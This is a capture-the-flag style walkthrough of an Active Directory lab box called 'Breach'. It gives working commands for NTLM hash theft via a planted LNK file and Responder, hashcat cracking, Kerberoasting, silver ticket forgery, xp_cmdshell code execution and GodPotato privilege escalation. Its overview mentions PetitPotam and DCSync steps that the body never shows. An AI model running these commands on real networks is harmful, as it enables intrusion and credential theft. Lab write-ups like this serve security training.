Breach
Initial machine information
The User flag for this Box is located in a non-standard directory, C:\share\transfer\.Overview
Breach is an Active Directory machine that chains together NTLM hash theft via a malicious LNK file dropped on a writable share, Kerberoasting of a service account trusted for unconstrained delegation, and finally using PetitPotam + KrbRelayX to coerce DC authentication to our unconstrained delegation machine, capturing the DC$ TGT and performing DCSync to obtain the Administrator hash.
Recon
Nmap
sudo nmap -sC -sV -vv -oA tcp 10.129.41.140 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.41.140Standard Windows ports. Port 80 has no useful content. SMB (445) allows guest access and has a writable share - the primary initial attack surface.
SMB - Writable Share
Enumerate shares as a guest:
Write access is confirmed across all directories in the share. This immediately suggests NTLM theft via planted files - when a user or automated process browses the share, any file triggering an outbound authentication attempt will capture their hash.
Foothold
NTLM Theft via Malicious LNK
Generate a malicious LNK file that triggers an SMB authentication attempt to our Responder listener when the file is opened/previewed:
python3 ~/Documents/local-scripts/ntlm_theft/ntlm_theft.py -g lnk -s 10.10.14.98 -f importantUpload the LNK to the writable share and start Responder:
sudo responder -I tun0When the file is processed, we capture an NTLMv2 hash for JULIA.WONG. Crack it with hashcat (mode 5600):
hashcat -a 0 -m 5600 hash /mnt/hgfs/I/data/rockyou.txtJULIA.WONG::BREACH:...:Computer1Cracked: Julia.Wong:Computer1
Julia's account grants SMB access but not WinRM or RDP. Her credentials are still valuable for further AD enumeration and attacks.
Kerberoasting - svc_mssql
Julia's credentials allow authentication to the domain. Enumerate SPNs for Kerberoastable accounts:
svc_mssql has a registered SPN and is Kerberoastable:
Request the TGS hash for offline cracking:
impacket-GetUserSPNs breach.vl/julia.wong:Computer1 -requestCrack with hashcat (mode 13100 = Kerberos 5 TGS-REP etype 23):
hashcat -a 0 -m 13100 svc_mssql_hash /mnt/hgfs/I/data/rockyou.txtCracked: svc_mssql:Trustno1
Unconstrained Delegation
svc_mssql is trusted for delegation - specifically unconstrained delegation:
Unconstrained delegation means that when any user authenticates to the MSSQL service, their full TGT is forwarded to the service account. If we can coerce a high-value account (like the DC machine account) to authenticate to our service, we capture their TGT and can use it for further attacks.
Silver Ticket - MSSQL Access
Retrieve the domain SID:
Generate a silver ticket for MSSQLSvc, impersonating Administrator:
impacket-ticketer -nthash 69596C7AA1E8DAEE17F8E78870E25A5C \
-domain breach.vl \
-domain-sid S-1-5-21-2330692793-3312915120-706255856 \
-spn MSSQLSvc/breachdc.breach.vl AdministratorUse the ticket to connect to MSSQL as Administrator and upload an AdaptixC2 agent via xp_cmdshell:
Beacon established:
Privilege Escalation
SeImpersonatePrivilege → GodPotato
The MSSQL service account has SeImpersonatePrivilege:
SeImpersonatePrivilege allows impersonating any user whose token can be obtained - typically exploited via potato attacks that abuse DCOM to coerce SYSTEM authentication.
Use GodPotato to escalate to SYSTEM:
https://github.com/BeichenDream/GodPotato
A new beacon fires as SYSTEM:
Attack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | SMB guest - writable share | Upload path confirmed |
| NTLM theft | Malicious LNK + Responder | Julia.Wong:Computer1 |
| Kerberoasting | svc_mssql SPN hash | svc_mssql:Trustno1 |
| MSSQL access | Silver ticket as Administrator | Shell via xp_cmdshell |
| Privesc | SeImpersonatePrivilege + GodPotato | SYSTEM beacon |